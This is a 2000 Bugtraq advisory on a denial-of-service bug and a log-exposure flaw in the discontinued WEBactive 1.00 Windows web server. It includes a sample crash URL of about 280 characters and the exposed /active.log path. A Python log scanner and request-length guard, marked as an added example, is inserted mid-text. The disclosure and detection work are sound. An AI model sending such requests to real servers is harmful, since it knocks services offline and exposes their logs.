[15778] in bugtraq


Lame DoS in WEBactive win65/NT server

daemon@ATHENA.MIT.EDU (Prizm)
Thu Jul 13 20:35:05 2000

Message-Id:  <200007130827.BAA32671@Rage.Resentment.org>
Date:         Thu, 13 Jul 2000 01:27:38 -800
Reply-To: Prizm <prizm@RESENTMENT.ORG>
From: Prizm <prizm@RESENTMENT.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM


I was looking for a small server to download recently to show one of
my friends something I had made and later I messed about with this
little program a bit and noticed some DoS bug. I have enclosed a .txt
file on the problem. Not a big deal, very unused product.

-Prizm
Attachment: webactive.txt

Application: ITAfrica's WebACTIVE version 1.00
Problem Type: Denial of Service
Author: Prizm <Prizm@RESENTMENT.org>
Platform(s): Windows 95/98/NT
Vendor Status: Not Informed, Project discontinued (I think)
Download URL: ftp://ftp.mira.net/mirrors/winsock-l/Windows95/Daemons/HTTPD/activ100.zip

Product Description
-------------------
    WEBactive HTTP Server 1.00 is an HTTP/1.00-compliant World Wide Web server daemon for
    Windows 95 or Windows NT, specifically designed for the SOHO (Small Office/Home)
    environment. It will operate on any TCP/IP connection to the Internet, whether via temporary
    dial-up or permanent leased-line connectivity.

Problem
-------

The problem is with bounds checking: when you request 280 characters, Webactiv.exe just shuts down.

Quick Example:

http://somedomain/0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

*Also*, by simply requesting /active.log you can view the webserver log, because active.log is
the default logfile name and the default directory is where that file is stored.
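The two findings above, from the defender's side, as an added example that is not part of the original advisory: a scan over web-server log lines that flags overlong request targets and requests for the log file itself, plus the request-line guard a server should apply before copying a target into a fixed buffer. The log format, the 255-character threshold, the sample lines and the function names are assumptions; the advisory does not show WEBactive's own log format.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample log lines in common log format (assumed; not WEBactive's real format).
# Line 3 carries a 280-character run of zeros, the length the advisory reports as fatal.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jul/2000:01:20:11 -0800] "GET /index.html HTTP/1.0" 200 1432
10.0.0.9 - - [13/Jul/2000:01:21:40 -0800] "GET /active.log HTTP/1.0" 200 8812
10.0.0.7 - - [13/Jul/2000:01:22:03 -0800] "GET /{} HTTP/1.0" 200 0
10.0.0.7 - - [13/Jul/2000:01:22:05 -0800] "GET /images/logo.gif HTTP/1.0" 200 2048
""".format("0" * 280)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)"'
)

MAX_TARGET_LEN = 255               # assumed threshold, below the 280 the advisory reports
SENSITIVE_PATHS = {"/active.log"}  # default WEBactive log file name per the advisory


@dataclass
class Finding:
    ip: str
    reason: str
    target: str


def scan_log(text: str, max_len: int = MAX_TARGET_LEN) -> List[Finding]:
    """Flag overlong request targets and direct requests for the server's own log file."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real collector would count these separately
        target = m.group("target")
        if len(target) > max_len:
            findings.append(Finding(m.group("ip"), "overlong-request-target", target[:40] + "..."))
        # Compare the path only, case-insensitively: Windows filenames are case-insensitive.
        path = target.split("?", 1)[0].lower()
        if path in SENSITIVE_PATHS:
            findings.append(Finding(m.group("ip"), "log-file-request", target))
    return findings


def accept_request_line(line: bytes, limit: int = MAX_TARGET_LEN) -> Tuple[bool, str]:
    """Server-side guard: reject a request target longer than `limit` before it is
    copied anywhere, which is the bounds check the advisory says the server lacks."""
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3:
        return False, "400 Bad Request"
    if len(parts[1]) > limit:
        return False, "414 Request-URI Too Long"
    return True, "ok"
```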

Vendor Status
-------------

Heh, this server was discontinued as far as I see... it is rather dated and doesn't support much.
Seeing as it was last revised in 1996, I think contacting the vendor would be rather meaningless... Also the fact that it is HTTP/1.00-compliant kind of hints it is no longer being updated.

Greetings
---------

Lamagra, Scrippie, eth0, Cruciphux/HWA and many others...



